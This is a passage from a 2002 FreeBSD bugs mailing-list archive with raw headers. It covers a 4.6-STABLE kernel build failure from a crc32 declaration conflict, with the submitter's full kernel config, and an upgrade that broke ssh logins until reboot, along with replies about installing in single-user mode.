FreeBSD.org Synopsis: http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/configtuning-configfiles.html's /var/db refs bogus? State-Changed-From-To: open->closed State-Changed-By: chern State-Changed-When: Wed Jul 31 02:57:41 PDT 2002 State-Changed-Why: Information is now up to date. Thanks! http://www.freebsd.org/cgi/query-pr.cgi?pr=41035 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 6:10:30 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D971B37B400 for ; Wed, 31 Jul 2002 06:10:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id BA6E043E6E for ; Wed, 31 Jul 2002 06:10:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VDA1JU041291 for ; Wed, 31 Jul 2002 06:10:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6VDA1UA041290; Wed, 31 Jul 2002 06:10:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 771FC37B400 for ; Wed, 31 Jul 2002 06:01:28 -0700 (PDT) Received: from europa.markpeglow.net (mail.markpeglow.net [216.170.136.81]) by mx1.FreeBSD.org (Postfix) with ESMTP id ABC6943E4A for ; Wed, 31 Jul 2002 06:01:27 -0700 (PDT) (envelope-from mrp@markpeglow.net) Received: from europa.markpeglow.net (localhost [127.0.0.1]) by europa.markpeglow.net (8.12.5/8.12.5) with ESMTP id g6VD1QCO008615 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO) for ; Wed, 31 Jul 2002 08:01:26 -0500 (CDT) (envelope-from mrp@europa.markpeglow.net) Received: (from mrp@localhost) by europa.markpeglow.net (8.12.5/8.12.5/Submit) id g6VD1QxP008614; Wed, 31 Jul 2002 08:01:26 -0500 (CDT) Message-Id: <200207311301.g6VD1QxP008614@europa.markpeglow.net> Date: Wed, 31 Jul 2002 08:01:26 -0500 (CDT) From: Mark Peglow Reply-To: Mark Peglow To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/41201: 4.6-STABLE kernel build breaks in sys/net/zlib.c Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41201 >Category: kern >Synopsis: 4.6-STABLE kernel build breaks in sys/net/zlib.c >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jul 31 06:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Mark Peglow >Release: FreeBSD 4.6-STABLE i386 >Organization: None. >Environment: System: FreeBSD europa.markpeglow.net 4.6-STABLE FreeBSD 4.6-STABLE #5: Wed Jul 31 05:15:00 CDT 2002 root@europa.markpeglow.net:/usr/obj/usr/src/sys/EUROPA i386 Kernel Configuration file: machine i386 cpu I586_CPU cpu I686_CPU ident EUROPA maxusers 256 #makeoptions DEBUG=-g #Build kernel with gdb(1) debug symbols options MATH_EMULATE #Support for x87 emulation options INET #InterNETworking options INET6 #IPv6 communications protocols options FFS #Berkeley Fast Filesystem options FFS_ROOT #FFS usable as root device [keep this!] options SOFTUPDATES #Enable FFS soft updates support options MFS #Memory Filesystem options MD_ROOT #MD is a potential root device options NFS #Network Filesystem options NFS_ROOT #NFS usable as root device, NFS required options MSDOSFS #MSDOS Filesystem options CD9660 #ISO 9660 Filesystem options CD9660_ROOT #CD-ROM usable as root, CD9660 required options PROCFS #Process filesystem options COMPAT_43 #Compatible with BSD 4.3 [KEEP THIS!] options SCSI_DELAY=15000 #Delay (in ms) before probing SCSI options UCONSOLE #Allow users to grab the console options USERCONFIG #boot -c editor options VISUAL_USERCONFIG #visual boot -c editor options KTRACE #ktrace(1) support options SYSVSHM #SYSV-style shared memory options SYSVMSG #SYSV-style message queues options SYSVSEM #SYSV-style semaphores options P1003_1B #Posix P1003_1B real-time extensions options _KPOSIX_PRIORITY_SCHEDULING options ICMP_BANDLIM #Rate limit bad replies options KBD_INSTALL_CDEV # install a CDEV entry in /dev options IPSEC options IPSEC_ESP options IPFILTER options IPFILTER_LOG options IPSTEALTH options TCP_DROP_SYNFIN #options TCP_RESTRICT_RST options SOFTUPDATES options PNPBIOS # On board sound # To make an SMP kernel, the next two are needed #options SMP # Symmetric MultiProcessor Kernel #options APIC_IO # Symmetric (APIC) I/O # Optionally these may need tweaked, (defaults shown): #options NCPU=2 # number of CPUs #options NBUS=4 # number of busses #options NAPIC=1 # number of IO APICs #options NINTR=24 # number of INTs device isa device eisa device pci device smb device smbus device iicbus device iicbb device iicsmb device viapm # Floppy drives device fdc0 at isa? port IO_FD1 irq 6 drq 2 device fd0 at fdc0 drive 0 device fd1 at fdc0 drive 1 # ATA and ATAPI devices device ata0 at isa? port IO_WD1 irq 14 device ata1 at isa? port IO_WD2 irq 15 device ata device atadisk # ATA disk drives device atapicd # ATAPI CDROM drives device atapifd # ATAPI floppy drives device atapist # ATAPI tape drives options ATA_STATIC_ID #Static device numbering #options ATA_ENABLE_ATAPI_DMA #Enable DMA on ATAPI devices # SCSI Controllers device ahb # EISA AHA1742 family device ahc # AHA2940 and onboard AIC7xxx devices device amd # AMD 53C974 (Teckram DC-390(T)) device tekram_trm # Tekram DC395 device dpt # DPT Smartcache - See LINT for options! device isp # Qlogic family device ncr # NCR/Symbios Logic device sym # NCR/Symbios Logic (newer chipsets) options SYM_SETUP_LP_PROBE_MAP=0x40 # Allow ncr to attach legacy NCR devices when # both sym and ncr are configured device adv0 at isa? device adw device bt0 at isa? device aha0 at isa? device aic0 at isa? # SCSI peripherals device scbus # SCSI bus (required) device da # Direct Access (disks) device sa # Sequential Access (tape etc) device cd # CD device pass # Passthrough device (direct SCSI access) # RAID controllers device ida # Compaq Smart RAID device amr # AMI MegaRAID device mlx # Mylex DAC960 family device twe # 3ware Escalade # atkbdc0 controls both the keyboard and the PS/2 mouse device atkbdc0 at isa? port IO_KBD device atkbd0 at atkbdc? irq 1 flags 0x1 device psm0 at atkbdc? irq 12 device vga0 at isa? # splash screen/screen saver pseudo-device splash # syscons is the default console driver, resembling an SCO console device sc0 at isa? flags 0x100 # Enable this and PCVT_FREEBSD for pcvt vt220 compatible console driver #device vt0 at isa? #options XSERVER # support for X server on a vt console #options FAT_CURSOR # start with block cursor # If you have a ThinkPAD, uncomment this along with the rest of the PCVT lines #options PCVT_SCANSET=2 # IBM keyboards are non-std # Floating point support - do not disable. device npx0 at nexus? port IO_NPX irq 13 # Power management support (see LINT for more options) device apm0 at nexus? flags 0x20 # Advanced Power Management device intpm device alpm device ichsmb # PCCARD (PCMCIA) support device card device pcic0 at isa? irq 10 port 0x3e0 iomem 0xd0000 device pcic1 at isa? irq 11 port 0x3e2 iomem 0xd4000 disable # Serial (COM) ports device sio0 at isa? port IO_COM1 flags 0x10 irq 4 device sio1 at isa? port IO_COM2 irq 3 device sio2 at isa? disable port IO_COM3 irq 5 device sio3 at isa? disable port IO_COM4 irq 9 # Parallel port device ppc0 at isa? irq 7 device ppbus # Parallel port bus (required) device lpt # Printer device plip # TCP/IP over parallel device ppi # Parallel port interface device device vpo # Requires scbus and da # PCI Ethernet NICs. device de # DEC/Intel DC21x4x (``Tulip'') device fxp # Intel EtherExpress PRO/100B (82557, 82558) device tx # SMC 9432TX (83c170 ``EPIC'') device vx # 3Com 3c590, 3c595 (``Vortex'') device wx # Intel Gigabit Ethernet Card (``Wiseman'') # PCI Ethernet NICs that use the common MII bus controller code. device miibus # MII bus support device dc # DEC/Intel 21143 and various workalikes device rl # RealTek 8129/8139 device sf # Adaptec AIC-6915 (``Starfire'') device sis # Silicon Integrated Systems SiS 900/SiS 7016 device ste # Sundance ST201 (D-Link DFE-550TX) device tl # Texas Instruments ThunderLAN device vr # VIA Rhine, Rhine II device wb # Winbond W89C840F device xl # 3Com 3c90x (``Boomerang'', ``Cyclone'') # ISA Ethernet NICs. device ed0 at isa? port 0x280 irq 10 iomem 0xd8000 device ex device ep # WaveLAN/IEEE 802.11 wireless NICs. Note: the WaveLAN/IEEE really # exists only as a PCMCIA device, so there is no ISA attatement needed # and resources will always be dynamically assigned by the pccard code. device wi # Aironet 4500/4800 802.11 wireless NICs. Note: the declaration below will # work for PCMCIA and PCI cards, as well as ISA cards set to ISA PnP # mode (the factory default). If you set the switches on your ISA # card for a manually chosen I/O address and IRQ, you must specify # those paremeters here. device an # Xircom Ethernet device xe # The probe order of these is presently determined by i386/isa/isa_compat.c. device ie0 at isa? port 0x300 irq 10 iomem 0xd0000 device fe0 at isa? port 0x300 device le0 at isa? port 0x300 irq 5 iomem 0xd0000 device lnc0 at isa? port 0x280 irq 10 drq 0 device cs0 at isa? port 0x300 device sn0 at isa? port 0x300 irq 10 # Pseudo devices - the number indicates how many units to allocated. pseudo-device loop # Network loopback pseudo-device ether # Ethernet support pseudo-device sl 1 # Kernel SLIP pseudo-device ppp 1 # Kernel PPP pseudo-device tun # Packet tunnel. pseudo-device pty # Pseudo-ttys (telnet etc) pseudo-device md # Memory "disks" pseudo-device gif # IPv6 and IPv4 tunneling pseudo-device faith # IPv6-to-IPv4 relaying (translation) pseudo-device stf pseudo-device vn pseudo-device speaker pseudo-device gzip # The `bpf' pseudo-device enables the Berkeley Packet Filter. # Be aware of the administrative consequences of enabling this! pseudo-device bpf #Berkeley packet filter # USB support device uhci # UHCI PCI->USB interface device ohci # OHCI PCI->USB interface device usb # USB Bus (required) device ugen # Generic device uhid # "Human Interface Devices" device ukbd # Keyboard device ulpt # Printer device umass # Disks/Mass storage - Requires scbus and da device ums # Mouse # USB Ethernet, requires mii device aue # ADMtek USB ethernet device cue # CATC USB ethernet device kue # Kawasaki LSI USB ethernet # # Sound # device pcm #device sbc0 at isa? port 0x220 irq 5 drq 1 flags 0x15 # # Joystick port # device joy0 at isa? port IO_GAME # # Video capture card # device bktr >Description: After doing a cvsup this morning, the build of the kernel breaks at: cc -c -O -pipe -Wall -Wredundant-decls -Wnested-externs -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -Winline -Wcast-qual -fformat-extensions -ansi -nostdinc -I- -I. -I/usr/src/sys -I/usr/src/sys/../include -I/usr/src/sys/contrib/ipfilter -D_KERNEL -include opt_global.h -elf -mpreferred-stack-boundary=2 /usr/src/sys/net/zlib.c In file included from /usr/src/sys/net/zlib.c:58: /usr/src/sys/sys/systm.h:116: conflicting types for `crc32' /usr/src/sys/net/zlib.h:961: previous declaration of `crc32' /usr/src/sys/sys/systm.h:116: warning: redundant redeclaration of `crc32' in same scope /usr/src/sys/net/zlib.h:961: warning: previous declaration of `crc32' *** Error code 1 Stop in /usr/obj/usr/src/sys/EUROPA. *** Error code 1 Stop in /usr/src. *** Error code 1 Stop in /usr/src. Two hours earlier, the system rebuilt fine (I noticed the problem when rebuilding other systems and I used mine to verify that it was a problem). The following changes may have some effect on this: Checkout src/sys/libkern/crc32.c Edit src/sys/sys/systm.h Add delta 1.111.2.15 2002.07.31.09.08.34 imp from this cvs commit: imp 2002/07/31 02:08:35 PDT Modified files: (Branch: RELENG_4) sys/conf files sys/sys systm.h Added files: (Branch: RELENG_4) sys/libkern crc32.c Log: MFC: phk's crc32 stuff + one typo fix. Stuff depending on this will be merged shortly. Revision Changes Path 1.340.2.108 +2 -1 src/sys/conf/files 1.1.2.1 +107 -0 src/sys/libkern/crc32.c (new) 1.111.2.15 +2 -0 src/sys/sys/systm.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message As this occured between the first build of the kernel and the second. >How-To-Repeat: cvsup and make buildkernel after this commit (I use cvsup6). >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 6:20: 6 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A361537B400 for ; Wed, 31 Jul 2002 06:20:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id D23C743E70 for ; Wed, 31 Jul 2002 06:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VDK1JU047841 for ; Wed, 31 Jul 2002 06:20:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6VDK1YM047840; Wed, 31 Jul 2002 06:20:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EBB5537B400 for ; Wed, 31 Jul 2002 06:18:16 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id AF0AE43E3B for ; Wed, 31 Jul 2002 06:18:16 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VDIGOT056015 for ; Wed, 31 Jul 2002 06:18:16 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g6VDIGSL056014; Wed, 31 Jul 2002 06:18:16 -0700 (PDT) Message-Id: <200207311318.g6VDIGSL056014@www.freebsd.org> Date: Wed, 31 Jul 2002 06:18:16 -0700 (PDT) From: Diomidis Spinellis To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/41202: Upgrade to 4.6.1-RELEASE-p3 breaks remote ssh login until the next reboot Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41202 >Category: misc >Synopsis: Upgrade to 4.6.1-RELEASE-p3 breaks remote ssh login until the next reboot >Confidential: no >Severity: non-critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: doc-bug >Submitter-Id: current-users >Arrival-Date: Wed Jul 31 06:20:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Diomidis Spinellis >Release: 4.6.1-RELEASE-p3 >Organization: Athens University of Economics and Business >Environment: >Description: After the make installworld of a 4.6.1-RELEASE-p3 upgrade the machine will stop accepting incoming ssh connections due to loadable module mismatches: Jul 31 15:34:58 istlab sshd[11976]: unable to dlopen(/usr/lib/pam_skey.so) Jul 31 15:34:58 istlab sshd[11976]: [dlerror: /usr/lib/pam_skey.so: Undefined symbol "pam_set_option"] >How-To-Repeat: >Fix: A reboot fixes this problem. It might be worthwhile to notify potential upgraders. Those performing a remote upgrade will want to keep their ssh terminal session open and execute a reboot after the installworld, otherwise they will have to get local access to the machine's console. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 7:18: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 88A9937B400; Wed, 31 Jul 2002 07:18:07 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3BBBC43E65; Wed, 31 Jul 2002 07:18:07 -0700 (PDT) (envelope-from maxim@FreeBSD.org) Received: from freefall.freebsd.org (maxim@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VEI7JU060164; Wed, 31 Jul 2002 07:18:07 -0700 (PDT) (envelope-from maxim@freefall.freebsd.org) Received: (from maxim@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6VEI6M0060160; Wed, 31 Jul 2002 07:18:06 -0700 (PDT) Date: Wed, 31 Jul 2002 07:18:06 -0700 (PDT) From: Maxim Konovalov Message-Id: <200207311418.g6VEI6M0060160@freefall.freebsd.org> To: mrp@pobox.com, maxim@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/41201: 4.6-STABLE kernel build breaks in sys/net/zlib.c Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: 4.6-STABLE kernel build breaks in sys/net/zlib.c State-Changed-From-To: open->closed State-Changed-By: maxim State-Changed-When: Wed Jul 31 07:17:08 PDT 2002 State-Changed-Why: Fixed in rev. 1.7.2.1 src/sys/net/zlib.h. http://www.freebsd.org/cgi/query-pr.cgi?pr=41201 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 8: 0:20 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 109D537B400 for ; Wed, 31 Jul 2002 08:00:15 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id C083F43E31 for ; Wed, 31 Jul 2002 08:00:14 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VF0EJU077505 for ; Wed, 31 Jul 2002 08:00:14 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6VF0Equ077504; Wed, 31 Jul 2002 08:00:14 -0700 (PDT) Date: Wed, 31 Jul 2002 08:00:14 -0700 (PDT) Message-Id: <200207311500.g6VF0Equ077504@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Simon 'corecode' Schubert" Subject: Re: bin/41190: in sed, report the { linenum instead of EOF linenum on pending } Reply-To: "Simon 'corecode' Schubert" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/41190; it has been noted by GNATS. From: "Simon 'corecode' Schubert" To: Cyrille Lefevre Cc: FreeBSD-gnats-submit@FreeBSD.ORG, tjr@FreeBSD.ORG Subject: Re: bin/41190: in sed, report the { linenum instead of EOF linenum on pending } Date: Wed, 31 Jul 2002 16:52:50 +0200 --=.njZdDoSOH3BiKf Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit On Wed, 31 Jul 2002 04:00:13 +0200 (CEST) Cyrille Lefevre wrote: > >Description: > actually, sed reports the EOF linenum on pending }. this patch > makes sed to report the { linenum instead. i think that's counter-intuitive as all programs i know of report the line containing the error (pending }) and don't guess about where it could have originated: % echo 'foo() {' > foo.c && cc foo.c foo.c: In function `foo': foo.c:2: syntax error at end of input cheers simon -- /"\ http://corecode.ath.cx/#donate \ / \ ASCII Ribbon Campaign / \ Against HTML Mail and News --=.njZdDoSOH3BiKf Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9R/nGr5S+dk6z85oRArPKAKCDPeJXGOKSh65LSjgwJb9xTxVpSQCgwA3y PyDf7NEht7KwyEhTmRWLtCE= =nOYh -----END PGP SIGNATURE----- --=.njZdDoSOH3BiKf-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 8: 0:26 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AA4C037B401 for ; Wed, 31 Jul 2002 08:00:17 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 654E143E6A for ; Wed, 31 Jul 2002 08:00:17 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VF0HJU077513 for ; Wed, 31 Jul 2002 08:00:17 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6VF0HZn077512; Wed, 31 Jul 2002 08:00:17 -0700 (PDT) Date: Wed, 31 Jul 2002 08:00:17 -0700 (PDT) Message-Id: <200207311500.g6VF0HZn077512@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Simon 'corecode' Schubert" Subject: Re: misc/41202: Upgrade to 4.6.1-RELEASE-p3 breaks remote ssh login until the next reboot Reply-To: "Simon 'corecode' Schubert" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR misc/41202; it has been noted by GNATS. From: "Simon 'corecode' Schubert" To: Diomidis Spinellis Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: misc/41202: Upgrade to 4.6.1-RELEASE-p3 breaks remote ssh login until the next reboot Date: Wed, 31 Jul 2002 16:58:45 +0200 --=.dYxDWm(zshZBOq Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit On Wed, 31 Jul 2002 06:18:16 -0700 (PDT) Diomidis Spinellis wrote: > >Fix: > A reboot fixes this problem. It might be worthwhile to notify > potential upgraders. > Those performing a remote upgrade will want to keep their ssh terminal > session open and execute a reboot after the installworld, otherwise > they will have to get local access to the machine's console. as the handbook states in 19.4: 19.4.8 Reboot into Single User Mode [...] 19.4.9 Install the New System Binaries [i.e. installworld] you should do an installworld only while running the system in single user mode. this way no collisions happen with network, pam, .so's or whatever. -- /"\ http://corecode.ath.cx/#donate \ / \ ASCII Ribbon Campaign / \ Against HTML Mail and News --=.dYxDWm(zshZBOq Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9R/sor5S+dk6z85oRArpKAJ4rj9rzx/Cn9vB8xfKpi289kjFZBwCgjlEg rnJznNz6XcD31rlMxVW+2Dw= =mVzY -----END PGP SIGNATURE----- --=.dYxDWm(zshZBOq-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 8:35:18 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E70D137B400 for ; Wed, 31 Jul 2002 08:35:16 -0700 (PDT) Received: from reiher.informatik.uni-wuerzburg.de (wi4d22.informatik.uni-wuerzburg.de [132.187.101.122]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3F8AE43E42 for ; Wed, 31 Jul 2002 08:35:16 -0700 (PDT) (envelope-from mkb@mukappabeta.de) Received: from mukappabeta.de (localhost [127.0.0.1]) by reiher.informatik.uni-wuerzburg.de (Postfix) with ESMTP id DF87BAF54; Wed, 31 Jul 2002 17:35:14 +0200 (CEST) Message-ID: <3D4803B2.7060302@mukappabeta.de> Date: Wed, 31 Jul 2002 17:35:14 +0200 From: Matthias Buelow User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020607 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Erwin Lansing Cc: Peter Pentchev , freebsd-bugs@FreeBSD.org Subject: Re: bin/41012: /etc/periodic/daily/440.status-mailq assumes sendmail References: <200207290740.g6T7e31g091006@freefall.freebsd.org> <3D454B81.2050405@mukappabeta.de> <20020730071817.GC2549@straylight.oblivion.bg> <3D46A85A.8090609@mukappabeta.net> <20020730150710.GA382@straylight.oblivion.bg> <3D46B2DD.6070809@mukappabeta.de> <20020731100834.C17892@droso.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Erwin Lansing wrote: >>(something like "have a look at periodic.conf for sendmail-specific >>mailq checks" would be ok.) >> > > Which is exactly what the postfix port does. Have a look at > /usr/ports/mail/postfix/pkg-message Uhh... I must've been blind or something. --mkb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 8:40:15 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AD8AA37B400 for ; Wed, 31 Jul 2002 08:40:09 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4D57643E72 for ; Wed, 31 Jul 2002 08:40:09 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6VFe8JU086013 for ; Wed, 31 Jul 2002 08:40:08 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6VFe8Ih086011; Wed, 31 Jul 2002 08:40:08 -0700 (PDT) Date: Wed, 31 Jul 2002 08:40:08 -0700 (PDT) Message-Id: <200207311540.g6VFe8Ih086011@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Peter Pentchev Subject: Re: misc/41202: Upgrade to 4.6.1-RELEASE-p3 breaks remote ssh login until the next reboot Reply-To: Peter Pentchev Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR misc/41202; it has been noted by GNATS. From: Peter Pentchev To: Simon 'corecode' Schubert Cc: bug-followup@FreeBSD.org Subject: Re: misc/41202: Upgrade to 4.6.1-RELEASE-p3 breaks remote ssh login until the next reboot Date: Wed, 31 Jul 2002 18:38:10 +0300 On Wed, Jul 31, 2002 at 08:00:17AM -0700, Simon 'corecode' Schubert wrote: > On Wed, 31 Jul 2002 06:18:16 -0700 (PDT) Diomidis Spinellis wrote: > > > >Fix: > > A reboot fixes this problem. It might be worthwhile to notify > > potential upgraders. > > Those performing a remote upgrade will want to keep their ssh terminal > > session open and execute a reboot after the installworld, otherwise > > they will have to get local access to the machine's console. > > as the handbook states in 19.4: > > 19.4.8 Reboot into Single User Mode > [...] > 19.4.9 Install the New System Binaries [i.e. installworld] > > you should do an installworld only while running the system in single > user mode. this way no collisions happen with network, pam, .so's or > whatever. This advice may often be disregarded, *BUT* not lightly! One must always be aware of the changes made to the system between rebuilds, if one chooses not to install in single user mode, or not to reboot after the installation is complete. The only ways I can think of to "always be aware" is to either track the changes via cvsweb or something similar, or read the src/UPDATING and similar files, *or* run the 'periodic security' command after the installation and take a good look at the differences it encounters. Special care should be taken with programs that change, and especially long-running daemons that have changed, such as sshd, or libraries that long-running daemons use. If such a daemon or a library should change during an installworld, it is almost certain that you have to restart the daemon to make sure that you are really running the latest version. I wonder if some of the information in what I just said should not go into the handbook.. I just might write something up and post it to -doc for review soonish :) If you are wondering what should be a legitimate reason not to go down into single-user mode, here's a hint - colocation :) G'luck, Peter -- Peter Pentchev roam@ringlet.net roam@FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 If wishes were fishes, the antecedent of this conditional would be true. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jul 31 12:53:51 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9852037B400; Wed, 31 Jul 2002 12:53:49 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9BCE243E3B; Wed, 31 Jul 2002 12:53:19 -0700 (PDT) (envelope-from silby@FreeBSD.org) Received: from freefall.freebsd.org (silby@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) 